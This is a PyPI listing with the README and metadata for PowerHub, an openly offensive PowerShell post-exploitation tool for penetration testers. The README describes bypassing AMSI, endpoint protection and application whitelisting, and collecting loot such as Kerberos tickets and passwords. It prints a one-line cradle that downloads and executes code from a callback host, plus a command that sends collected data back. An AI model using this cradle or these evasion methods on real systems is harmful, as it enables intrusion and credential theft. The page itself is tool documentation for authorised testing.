PowerHub


NamePowerHub JSON
Version 1.11.post1 PyPI version JSON
download
home_pagehttps://github.com/AdrianVollmer/PowerHub
SummaryA post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting
upload_time2023-02-07 17:02:20
maintainer
docs_urlNone
authorAdrian Vollmer
requires_python>=3
license
keywords
VCS
bugtrack_url
requirements cheroot cryptography Flask Flask-SocketIO flask-sqlalchemy pyOpenSSL pypykatz python-magic service_identity sqlalchemy twisted watchdog werkzeug wsgidav
Travis-CI No Travis.
coveralls test coverage No coveralls.
            PowerHub
========

PowerHub is a convenient post exploitation tool for PowerShell which aids a
pentester in transferring data, in particular code which may get flagged by
endpoint protection. Check out the
[Wiki](https://github.com/AdrianVollmer/PowerHub/wiki/)! Features:

* Fileless
* Stateless
* Cert pinning
* String "obfuscation" by RC4 encryption
* Choose your AMSI Bypass
* Transparent aliases for in-memory execution of C# programs


![PowerHub Webapp](https://github.com/AdrianVollmer/PowerHub/blob/master/img/powerhub-webapp.png)
![PowerHub Webapp](https://github.com/AdrianVollmer/PowerHub/blob/master/img/powerhub-sharphound.png)

During an engagement where you have a test client available, one of the
first things you want to do is run SharpHound, Seatbelt, PowerUp,
Invoke-PrivescCheck or PowerSploit. So you need to download the files,
mess with endpoint protection, disable the execution policy, etc.
PowerHub provides an (almost) one-click-solution for this. Oh, and you can
also run arbitrary binaries (PE and shell code) entirely in-memory using
PowerSploit's modules, which is sometimes useful to bypass application
whitelisting.

Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back
either as a file or a text snippet, via the command line or the web
interface. PowerHub also helps with collaboration in case you're a small
team.

Here is a simple example (grab information about local groups with PowerView
and transfer it back):

```powershell
PS C:\Users\avollmer> $K=New-Object Net.WebClient;'a=reflection','t=http'|%{IEX $K.DownloadString('http://192.168.11.2:8080/0?'+$_)}
True
  _____   _____  _  _  _ _______  ______ _     _ _     _ ______
 |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]
 |       |_____| |__|__| |______ |    \_ |     | |_____| |_____]
1.11                        written by Adrian Vollmer, 2018-2022
Run 'Help-PowerHub' for help
PS C:\Users\avollmer> Get-HubModule PowerView


Name   : /home/avollmer/.local/share/powerhub/modules/PowerSploit/Recon/PowerView.ps1
Type   : ps1
N      : 205
Loaded : True
Alias  :

PS C:\Users\avollmer> Get-LocalGroup | PushTo-Hub -Name groups.json
```


Installation
============

PowerHub can be installed like any other Python package. Just execute
`python3 -m pip install powerhub`. If you like to work with virtual
environments, I recommend [pipx](https://github.com/pypa/pipx/).

If you want to use the latest version on the dev branch, clone this
repository and install with `python3 -m pip install -e .`.

For building the payloads, you need the MinGW GCC and Mono C# compilers. On
Debian-like systems, you can install them with `apt-get install mono-mcs
gcc-mingw-w64-x86-64 gcc-mingw-w64-i686`.


Usage
=====

PowerHub has one mandatory argument: the callback host (can be an IP
address). You should also use `--auth <user>:<pass>`, otherwise, a randomly
generated password will be used for basic authentication. The switch
`--no-auth` disables basic authentication which is *not recommended*. The
callback host name is used by the stager to download the payload. If the
callback port or path differ from the default, it can also be changed.

Read `powerhub --help` and the [Wiki](https://github.com/AdrianVollmer/PowerHub/wiki/Usage) for details.


Credits
=======

PowerHub is partially based on the awesome work of zc00l, @am0nsec, mar10,
p3nt4, @SkelSec. And of course, it would be nothing without @harmj0y,
@mattifestation and the many other contributors to
[PowerSploit](https://github.com/PowerShellMafia/PowerSploit).

Thanks!

Author
======

Adrian Vollmer, 2018-2022

Disclaimer
==========

Use at your own risk. Do not use without full consent of everyone involved.
For educational purposes only.

            

Raw data

            {
    "_id": null,
    "home_page": "https://github.com/AdrianVollmer/PowerHub",
    "name": "PowerHub",
    "maintainer": "",
    "docs_url": null,
    "requires_python": ">=3",
    "maintainer_email": "",
    "keywords": "",
    "author": "Adrian Vollmer",
    "author_email": "",
    "download_url": "https://files.pythonhosted.org/packages/b2/a1/1cf38ba90668af48f8eba9ee21650ae04eca17a2338e7325671fe79f47f0/PowerHub-1.11.post1.tar.gz",
    "platform": null,
    "description": "PowerHub\n========\n\nPowerHub is a convenient post exploitation tool for PowerShell which aids a\npentester in transferring data, in particular code which may get flagged by\nendpoint protection. Check out the\n[Wiki](https://github.com/AdrianVollmer/PowerHub/wiki/)! Features:\n\n* Fileless\n* Stateless\n* Cert pinning\n* String \"obfuscation\" by RC4 encryption\n* Choose your AMSI Bypass\n* Transparent aliases for in-memory execution of C# programs\n\n\n![PowerHub Webapp](https://github.com/AdrianVollmer/PowerHub/blob/master/img/powerhub-webapp.png)\n![PowerHub Webapp](https://github.com/AdrianVollmer/PowerHub/blob/master/img/powerhub-sharphound.png)\n\nDuring an engagement where you have a test client available, one of the\nfirst things you want to do is run SharpHound, Seatbelt, PowerUp,\nInvoke-PrivescCheck or PowerSploit. So you need to download the files,\nmess with endpoint protection, disable the execution policy, etc.\nPowerHub provides an (almost) one-click-solution for this. Oh, and you can\nalso run arbitrary binaries (PE and shell code) entirely in-memory using\nPowerSploit's modules, which is sometimes useful to bypass application\nwhitelisting.\n\nYour loot (Kerberos tickets, passwords, etc.) can be easily transferred back\neither as a file or a text snippet, via the command line or the web\ninterface. PowerHub also helps with collaboration in case you're a small\nteam.\n\nHere is a simple example (grab information about local groups with PowerView\nand transfer it back):\n\n```powershell\nPS C:\\Users\\avollmer> $K=New-Object Net.WebClient;'a=reflection','t=http'|%{IEX $K.DownloadString('http://192.168.11.2:8080/0?'+$_)}\nTrue\n  _____   _____  _  _  _ _______  ______ _     _ _     _ ______\n |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]\n |       |_____| |__|__| |______ |    \\_ |     | |_____| |_____]\n1.11                        written by Adrian Vollmer, 2018-2022\nRun 'Help-PowerHub' for help\nPS C:\\Users\\avollmer> Get-HubModule PowerView\n\n\nName   : /home/avollmer/.local/share/powerhub/modules/PowerSploit/Recon/PowerView.ps1\nType   : ps1\nN      : 205\nLoaded : True\nAlias  :\n\nPS C:\\Users\\avollmer> Get-LocalGroup | PushTo-Hub -Name groups.json\n```\n\n\nInstallation\n============\n\nPowerHub can be installed like any other Python package. Just execute\n`python3 -m pip install powerhub`. If you like to work with virtual\nenvironments, I recommend [pipx](https://github.com/pypa/pipx/).\n\nIf you want to use the latest version on the dev branch, clone this\nrepository and install with `python3 -m pip install -e .`.\n\nFor building the payloads, you need the MinGW GCC and Mono C# compilers. On\nDebian-like systems, you can install them with `apt-get install mono-mcs\ngcc-mingw-w64-x86-64 gcc-mingw-w64-i686`.\n\n\nUsage\n=====\n\nPowerHub has one mandatory argument: the callback host (can be an IP\naddress). You should also use `--auth <user>:<pass>`, otherwise, a randomly\ngenerated password will be used for basic authentication. The switch\n`--no-auth` disables basic authentication which is *not recommended*. The\ncallback host name is used by the stager to download the payload. If the\ncallback port or path differ from the default, it can also be changed.\n\nRead `powerhub --help` and the [Wiki](https://github.com/AdrianVollmer/PowerHub/wiki/Usage) for details.\n\n\nCredits\n=======\n\nPowerHub is partially based on the awesome work of zc00l, @am0nsec, mar10,\np3nt4, @SkelSec. And of course, it would be nothing without @harmj0y,\n@mattifestation and the many other contributors to\n[PowerSploit](https://github.com/PowerShellMafia/PowerSploit).\n\nThanks!\n\nAuthor\n======\n\nAdrian Vollmer, 2018-2022\n\nDisclaimer\n==========\n\nUse at your own risk. Do not use without full consent of everyone involved.\nFor educational purposes only.\n",
    "bugtrack_url": null,
    "license": "",
    "summary": "A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting",
    "version": "1.11.post1",
    "split_keywords": [],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "b2a11cf38ba90668af48f8eba9ee21650ae04eca17a2338e7325671fe79f47f0",
                "md5": "64a3a54e543e268d0fb4d09711c85b34",
                "sha256": "bbab86f3ba2341f4d91d5a3c0966c9b8ed741b4845e68c5239aa3877972f11c1"
            },
            "downloads": -1,
            "filename": "PowerHub-1.11.post1.tar.gz",
            "has_sig": false,
            "md5_digest": "64a3a54e543e268d0fb4d09711c85b34",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": ">=3",
            "size": 814974,
            "upload_time": "2023-02-07T17:02:20",
            "upload_time_iso_8601": "2023-02-07T17:02:20.983491Z",
            "url": "https://files.pythonhosted.org/packages/b2/a1/1cf38ba90668af48f8eba9ee21650ae04eca17a2338e7325671fe79f47f0/PowerHub-1.11.post1.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2023-02-07 17:02:20",
    "github": true,
    "gitlab": false,
    "bitbucket": false,
    "github_user": "AdrianVollmer",
    "github_project": "PowerHub",
    "travis_ci": false,
    "coveralls": false,
    "github_actions": false,
    "requirements": [
        {
            "name": "cheroot",
            "specs": []
        },
        {
            "name": "cryptography",
            "specs": []
        },
        {
            "name": "Flask",
            "specs": [
                [
                    ">=",
                    "1.0.2"
                ]
            ]
        },
        {
            "name": "Flask-SocketIO",
            "specs": [
                [
                    ">=",
                    "3.1.2"
                ]
            ]
        },
        {
            "name": "flask-sqlalchemy",
            "specs": [
                [
                    ">=",
                    "2.1"
                ],
                [
                    "<",
                    "3.0"
                ]
            ]
        },
        {
            "name": "pyOpenSSL",
            "specs": []
        },
        {
            "name": "pypykatz",
            "specs": [
                [
                    ">=",
                    "0.2.2"
                ]
            ]
        },
        {
            "name": "python-magic",
            "specs": []
        },
        {
            "name": "service_identity",
            "specs": []
        },
        {
            "name": "sqlalchemy",
            "specs": [
                [
                    "<",
                    "2.0"
                ]
            ]
        },
        {
            "name": "twisted",
            "specs": [
                [
                    ">=",
                    "18.9.0"
                ]
            ]
        },
        {
            "name": "watchdog",
            "specs": []
        },
        {
            "name": "werkzeug",
            "specs": [
                [
                    ">=",
                    "0.15"
                ]
            ]
        },
        {
            "name": "wsgidav",
            "specs": [
                [
                    ">=",
                    "3.0.0"
                ]
            ]
        }
    ],
    "tox": true,
    "lcname": "powerhub"
}
        
Elapsed time: 0.09088s